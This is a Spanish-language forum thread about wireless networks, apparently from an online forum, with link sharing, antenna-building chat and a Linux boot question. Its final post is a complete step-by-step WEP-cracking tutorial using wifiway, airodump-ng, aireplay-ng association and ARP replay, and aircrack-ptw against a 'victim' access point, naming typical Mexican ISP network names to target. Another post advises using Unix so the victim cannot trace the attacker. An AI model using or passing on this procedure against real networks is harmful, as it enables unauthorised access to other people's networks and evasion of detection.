Re: Redes Wireless

aqui otra pagina muy bien explicada y con fotos tb http://www.hackinsoft.com/sitio/desencriptar.htm [nofollow]

No se dice que si la tarjeta entra en "modo consola", es si acepta modo monitor en windows o linux.

La distribucion Wifislax es un linux modificado para la "inseguridad wireless" como bien dice nuestro compañero er_locura.

Wifislax es la soluciona facil, para la gente sin conocimientos de los comandos en la consola kernel, y tambien para vagos, jejeje.

Yo hecharia una mano,pero esque no tengo demasiado tiempo.

Un saludo

Dije modo consola porque iba tirando de memoria mientras escribía y se me quedó lo de modo consola, es más fácil tirar del google y copiar y pegar, así no hay fallos de este tipo, xDDD, que yo sepa los comandos se pueden utilizar perfectamente en wifislax, la consola esta ahí como en ubuntu, mandriva, suse, etc, ya que estamos te voy a hacer una preguntilla hace tiempo que no toco linux y tenía una instalación hecha en uno de los discos duros de un pc bien se me fué el sector de arranque de linux porque reinstalé windows o no me acuerdo lo que hice de esto hace un par de años, me bajé el disco este que se llama creo supegrub o algo así para restaurar el arranque de linux, pero ya no quiero instalar linux, se puede cambiar la particion de linux a nfts o a fat32? si no se puede como restauro entonces con el disco supergrub el sector de arranque?. Saludos y gracias adelantadas.

muchas gracias por todo pero no entiendo ni papa
salud2

Buenas, crakear una red wifi será un delito, pero contaminar al vecino con ondas electromagnéticas de dudosa salubridad es una gran putada.

De las mejores paginas que he encontrado donde viene todo, manuales, fabricacion de antenas etc.
http://www.seguridadwireless.net/ [nofollow]
Solo para estudiar lo demas es ilegal.

Teniendo aun poca experiencia en redes wireles aconsejo a los iniciados tener una buena tarjeta wifi compatible con estos estudios y para los que utilicen pc, fabricarse sus propias antenas, a parte de ser entretenido se consigue con poquisimo dinero muy buenos resultados. En mi caso tengo varias antenas entre la que mejor resultado hasta ahora ha sido la realizada con una caja de cd y la helicoidal hecha con una sarten vieja y un tuvo de pvc.
Fenomenal foro de estudio. En otra ocasion que se pueda , pondre fotos de las antenas.

ala hora de crackear usen unix, nunca windws, porq windows deja muxos rastros y como a quienle esteis crackeando controlo os la puede liar..

yo dejo este manual para crackear wifi usando wifiway

Primero, hay que bajarse esta distribución Linux: wifiway 0.4, bajen el .iso, después graben la imagen en un CD.

Arrancamos el LiveCD y entramos en el modo startx.

Ok, habiendo hecho esto aquí empieza el verdadero proceso. Vamos a la carpeta:


/sys/class/net/wifi0/device/

y abrimos archivo channel. Ponemos 1, guardamos y cerramos archivo. (Problemas con este paso? Ve a las notas)

A continuación abrimos una terminal y escribimos:


airodump-ng rtap0

vamos a ver como empiezan a aparecer redes. Presionamos Ctrl + C para detener el proceso. Tomamos nota del BSSID de la red que queremos crackear. A continuación vamos a la carpeta en la que ya estábamos (device) y ahora abrimos el archivo:

BSSID
en este archivo copiamos el BSSID de la red que elegimos, lo guardamos y lo cerramos. (atención: a algunas personas les causa problemas cerrar este archivo despues de guardarlo. Prueben dejándolo abierto o también cerrándolo pero verifiquen que la BSSID quedo guardada).

Ahora empezamos a capturar paquetes con el siguiente comando:


airodump-ng -c CANAL DEL AP -w ARCHIVO GUARDA IVS rtap0

Donde:
Canal del AP: es el numero que aparece debajo de CH en la primer lista de redes que vimos.
Archivo guarda IVs: es el nombre de un archivo para que guarde todo lo capturado. Elijan el nombre.

Después de hacerlo vemos que empieza el proceso de captura de paquetes.

Vamos de nuevo a la carpeta Device y ahora abrimos el archivo rate, lo ponemos con valor 2 lo guardamos y lo cerramos.

Abrimos otra terminal y ahora necesitamos saber nuestro numero MAC de la tarjeta inalámbrica. Lo hacemos por medio de:

ifconfig wifi0 up
y luego

ifconfig
Es un numero de 12 digitos que viene etiquetado como HRDAW (o algo asi) en el apartado wifi0.

Lo que haremos ahora sera asociarnos al Access Point (red) victima utilizando el siguiente comando:

aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
Donde:
BSSID: es el numero que elegimos al principio, el MAC del Access Point victima (12 digitos).
MAC WIFI0: es el numero MAC que acabamos de obtener de nuestra tarjeta inalámbrica.
ESSID: Es el nombre del AP victima, aparece en la terminal donde estamos capturando paquetes, es la ultima columna hasta la derecha (Los usuarios de Infinitum en México normalmente tienen: 2WIRE + un numero menor que 999 o también INFINITUM + un numero menor que 9999 ).

Cuando la autentificación y la asociación sean exitosas abrimos otra terminal y ejecutamos el siguiente comando:


aireplay-ng -3 -b BSSID -h MAC WIFI0 wifi0

BSSID: Es lo mismo que en el anterior.
MAC WIFI0: Lo mismo que en el anterior.

Hecho esto los paquetes(#Data) en la terminal donde tenemos al airodump deberán de empezar a subir para el Access Point elegido.

Esperamos a que junte un mínimo de 30,000 #Data. Cuando este por encima de ese valor, ejecutamos:


aircrack-ptw ARCHIVO GUARDA IVS.cap
Donde:
ARCHIVO GUARDA IVS: Es el nombre que dimos al principio al archivo para que guardara IV's. OJO: deberás de poner un numero que corresponde a las veces que has capturado paquetes en esta sesión. Por ejemplo, si el nombre que asignamos al archivo fue WEP y si es la primera vez que capturas paquetes en esta sesión, el nombre que usaras aquí sería: WEP-01.cap esto también lo puedes verificar en la carpeta root.

En unos instantes te deberá aparecer la clave, en el renglón que diga Found Key. Si no aparece espera a que junte mas paquetes y vuelve a ejecutar este ultimo comando. Puede llegar a requerir hasta 100,000 o mas.

Notas:

Prueben varios valores de channel: si no aparece ninguna red en el airodump pero sabes que debería de aparecer alguna, entonces prueba con otros valores en channel. El rango posible es entre 1 y 11. No olvides guardar el archivo cuando lo modifiques.

Este tutorial es especial para las tarjetas Intel Pro/Wireless 3945ABG ya que el procedimiento común que se hace con otra, por ejemplo una Atheros, es diferente. Este tutorial puede funcionar con otras tarjetas que no sean Intel pero no lo he probado. Ademas para otras que ya son conocidas que si capturan e inyectan el proceso es mas fácil y pueden usar Backtrack.

agredecimientos a los compañeros de "seguridadWireless".